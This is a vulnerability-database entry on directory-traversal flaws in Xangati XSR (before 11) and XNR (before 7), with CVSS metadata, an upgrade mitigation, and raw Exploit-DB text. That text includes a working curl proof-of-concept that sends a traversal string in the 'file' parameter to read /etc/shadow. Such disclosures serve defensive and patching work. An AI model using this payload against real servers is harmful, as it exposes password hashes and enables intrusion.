header-logo
Suggest Exploit
vendor:
XSR and XNR
by:
SecurityFocus
7,5
CVSS
HIGH
Directory-Traversal
22
CWE
Product Name: XSR and XNR
Affected Version From: Xangati XSR prior to 11 and XNR prior to 7
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2014

Xangati XSR And XNR Directory-Traversal Vulnerabilities

A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.

Mitigation:

Upgrade to Xangati XSR 11 or XNR 7 or later versions.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/66817/info
 
Xangati XSR And XNR are prone to a multiple directory-traversal vulnerabilities.
 
A remote attacker could exploit these vulnerabilities using directory-traversal characters ('../') to access or read arbitrary files that contain sensitive information.
 
Xangati XSR prior to 11 and XNR prior to 7 are vulnerable. 

curl -i -s -k  -X 'POST' \
-H 'Content-Type: application/x-www-form-urlencoded' -H 'User-Agent: Java/1.7.0_25' \
--data-binary $'key=validkey&falconConfig=getfile&file=%2Ffloodguard%2F../../../../../../../../../etc/shadow' \
'hxxps://www.example.com/servlet/Installer'

Navigation

Suggest Exploit

Services By CQR